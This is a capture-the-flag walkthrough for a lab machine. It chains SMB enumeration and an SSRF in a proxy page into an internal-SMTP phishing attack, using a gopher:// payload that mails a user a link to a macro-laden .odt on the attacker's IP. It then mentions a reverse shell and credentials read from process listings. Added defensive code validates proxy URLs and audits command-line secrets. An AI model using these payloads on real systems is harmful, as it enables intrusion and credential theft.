Hello! Today we will hack this website.
We start with an nmap scan, which showed 8 open ports. Since SMB is open, let's see what is inside with the help of smbmap.
A share named "shares" can be accessed with a null session. Inside the share there was a .backup directory containing a file named mail.
We downloaded the mail file.
Reading the mail, we learn that a user named Jocelyn is susceptible to phishing and has a habit of clicking on links. Also, important documents will now be sent internally by mail and will use the .odt format. Finally, there is a web proxy, and it is less restrictive.
Visiting the IP redirected to gofer.htb, so it was added to /etc/hosts. The website itself had nothing of interest, so we searched for a sub-domain and found one named proxy, as suggested in the mail; it was also added to /etc/hosts.
That site greets us with a login page, and trying some common credentials did not work.
Testing common directories and files, only index.php returned a positive result. Changing the HTTP verb gave a different response: "Missing URL parameter !".
So, as hinted in the mail, this might be an SSRF, and we could confirm that it definitely is.
SMB → Mail Crafting
So, as found in the mail, we can reach the internal mail server through this vulnerability and get RCE. But first we need to craft a .odt exploit and send it by mail to Jocelyn Hudson (username jhudson, as seen in the mail and the user naming convention) from the website.
Based on the box's response as well as its name, it could be assumed that the gopher:// protocol is used to send files to other users.
The following GitHub repo helps create the required payload.
GitHub - tarunkant/Gopherus: This tool generates gopher link for exploiting SSRF and gaining RCE in various servers
The final piece of the puzzle was to send the "Enter" key through the application, which could be achieved with \r\n (CRLF).
Our payload:
gopher://2130706433:25/xHELO \r\n
MAIL FROM:<smaharjan@**********.com> \r\n
RCPT TO:<jhudson@**********.com> \r\n
DATA \r\n
From: <smaharjan@**********.com> \r\n
To: <jhudson@**********.com> \r\n
Subject: TestingTesting \r\n
\r\n
<a href='http://10.10.16.6/test.odt>hello</a> \r\n
. \r\n
QUIT \r\n
The following is the final, URL-encoded payload for execution.
gopher://2130706433:25/xHELO%250d%250aMAIL%20FROM%3A%3Csmaharjan@******.com%3E%250d%250aRCPT%20TO%3A%3Cjhudson@gofer.htb%3E%250d%250aDATA%250d%250aFrom%3A%20%3Csmaharjan@gofer.htb%3E%250d%250aTo%3A%20%3Cjhudson@gofer.htb%3E%250d%250a%250d%250aSubject%3A%20TestingTesting%250d%250a%250d%250a<a+href%3d'http%3a//10.10.16.6/test.odt>hello</a>%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
Upon sending the request, the response OK was received.
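The weakness exploited above is that the proxy fetches whatever the URL parameter names. As an added example (not code from the original write-up or from the box), here is the kind of server-side check that would have stopped each trick used: a non-HTTP scheme such as gopher://, a loopback address written as the decimal integer 2130706433 (127.0.0.1) or in hex, and CR/LF in the URL, including the double-encoded %250d%250a form. The function and constant names and the sample URLs are this example's own.

```python
"""Added example, not from the original write-up: a server-side allow-list
check for a URL-fetching proxy endpoint. It rejects the three tricks the
write-up relies on:
  * a non-HTTP scheme such as gopher://,
  * a loopback/internal address written as a decimal integer
    (2130706433 is 127.0.0.1) or in hex,
  * CR/LF in the URL, also when (double-)URL-encoded as %250d%250a.
Function and constant names, and the sample URLs, are this example's own."""
import ipaddress
import re
from typing import Optional, Tuple, Union
from urllib.parse import urlsplit

IPAddr = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {None, 80, 443}        # None = the scheme's default port
# a raw \r or \n, or %0d/%0a under any number of extra %25 encodings
CRLF_RE = re.compile(r"[\r\n]|%(?:25)*0[ad]", re.IGNORECASE)


def normalize_host(host: str) -> Optional[IPAddr]:
    """Return the IP address a host string denotes, in any spelling a
    fetcher might accept (dotted quad, IPv6, decimal or hex integer),
    or None if it is a plain hostname."""
    try:
        ip: IPAddr = ipaddress.ip_address(host)
    except ValueError:
        try:
            n = int(host, 0)           # "2130706433" or "0x7f000001"
        except ValueError:
            return None
        if not 0 <= n <= 0xFFFFFFFF:
            return None
        ip = ipaddress.IPv4Address(n)
    # ::ffff:127.0.0.1 is loopback too; judge the embedded IPv4 address
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
        ip = ip.ipv4_mapped
    return ip


def is_internal(ip: IPAddr) -> bool:
    """True for any address that should never be reachable through the proxy."""
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def check_url(url: str) -> Tuple[bool, str]:
    """Return (allowed, reason). Only reason == 'ok' means the URL may be fetched."""
    if CRLF_RE.search(url):
        return False, "crlf"
    try:
        parts = urlsplit(url)
        host, port = parts.hostname, parts.port   # .port raises on "host:abc"
    except ValueError:
        return False, "unparseable"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme"
    if not host:
        return False, "no-host"
    if port not in ALLOWED_PORTS:
        return False, "port"
    if host == "localhost" or host.endswith(".localhost"):
        return False, "internal"
    ip = normalize_host(host)
    if ip is not None and is_internal(ip):
        return False, "internal"
    # A real deployment must also resolve `host`, apply is_internal() to every
    # returned address, and pin that address for the actual fetch so a second
    # lookup (DNS rebinding) cannot change the answer.
    return True, "ok"


if __name__ == "__main__":
    for u in ("gopher://2130706433:25/xHELO",
              "http://2130706433/",
              "http://0x7f000001/",
              "http://example.com/a%250d%250aInjected",
              "https://example.com/docs/file.odt"):
        print(u, "->", check_url(u))
```

The order of the checks matters: the CRLF test runs on the raw string before any parsing, because the injected line breaks are what turn an HTTP-looking request into SMTP commands once the back-end decodes them. The port allow-list is what closes off port 25 even for a fetch that passes every other check.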
Document → RCE
The malicious .odt file was built with a macro, since the macro's code runs when the document is opened.
The following macro was created inside the file.
Then the vulnerability was triggered again; the file was requested and we got a reverse shell.
jhudson → tbuckley
Looking at the processes running on the machine, we found the credentials for user tbuckley being passed.
— snip —
Successfully logged on the user tbuckley.
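The tbuckley step works because a command line is visible to every local user through ps or /proc. As an added example (not part of the original write-up), here is a small audit that flags processes whose arguments carry a secret and masks the value in its own output. The ps listing embedded below is constructed for the example and the password values are placeholders; the real output of `ps -eo pid,user,args` can be fed to the same function.

```python
"""Added example, not from the original write-up: audit running processes
for credentials passed on the command line, the weakness that exposed the
tbuckley password. The ps output below is constructed for this example and
the password values are placeholders."""
import re
import subprocess
from typing import Dict, List

# A secret passed as an argument: -pSECRET, --password=SECRET,
# --password SECRET, or an ENV-style PASSWORD=/SECRET=/TOKEN= pair.
SECRET_ARG = re.compile(
    r"(?i)(?<![^\s])(-p|--?password[= ]|\w*(?:pass|secret|token)\w*=)(\S+)"
)

# Constructed sample of `ps -eo pid,user,args` output (not from the box).
SAMPLE_PS = """\
    PID USER     COMMAND
      1 root     /sbin/init
    812 tbuckley /usr/bin/python3 /opt/notes/sync.py --user tbuckley --password=EXAMPLE_PLACEHOLDER
    845 www-data /usr/sbin/apache2 -k start
    900 root     /usr/bin/mysql -u backup -pEXAMPLE_PLACEHOLDER -e 'SELECT 1'
"""


def find_exposed_secrets(ps_output: str) -> List[Dict[str, str]]:
    """Parse `ps -eo pid,user,args` output and return one entry per process
    whose arguments carry a secret, with the secret value masked so the
    report itself does not leak it."""
    findings = []
    for line in ps_output.splitlines():
        fields = line.split(None, 2)
        if len(fields) < 3 or not fields[0].isdigit():
            continue                      # header or malformed line
        pid, user, args = fields
        m = SECRET_ARG.search(args)
        if m:
            findings.append({"pid": pid, "user": user,
                             "masked": m.group(1) + "***"})
    return findings


def audit_live_system() -> List[Dict[str, str]]:
    """Run the audit against the host this script runs on."""
    out = subprocess.run(["ps", "-eo", "pid,user,args"],
                         capture_output=True, text=True, check=True).stdout
    return find_exposed_secrets(out)


if __name__ == "__main__":
    for f in find_exposed_secrets(SAMPLE_PS):
        print(f"pid {f['pid']} ({f['user']}): secret in argument {f['masked']}")
```

The fix for anything this flags is to move the secret out of the argument list: read it from a file with mode 0600, from a credentials helper, or from stdin, rather than from a flag that every user on the host can see.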
That's all. We hacked the site and now we have root access!
You can contact me if you have any questions.